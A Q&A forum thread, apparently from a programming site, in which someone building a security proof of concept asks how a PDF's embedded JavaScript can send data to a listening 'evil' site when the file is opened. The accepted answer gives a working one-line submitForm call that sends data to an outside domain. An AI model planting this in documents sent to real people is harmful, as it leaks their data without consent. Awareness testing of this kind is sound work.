# Send GET requests from a PDF file

Tags: javascript, pdf, acrobat

I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.
Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.

My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.
So I don't see how to make a GET request to my listening "evil" website.
I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.

Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).

Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.
Or something like this.

Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).

Thanks

Comment: Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

Comment: Okay, open a link in the browser in perfect for me, how to do that ?

Comment: And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)

Answer (score 1):

Okay I find a way by using :

```
this.submitForm("http://mydomain.fr/var="+thedataIwant);
```

The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.
The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker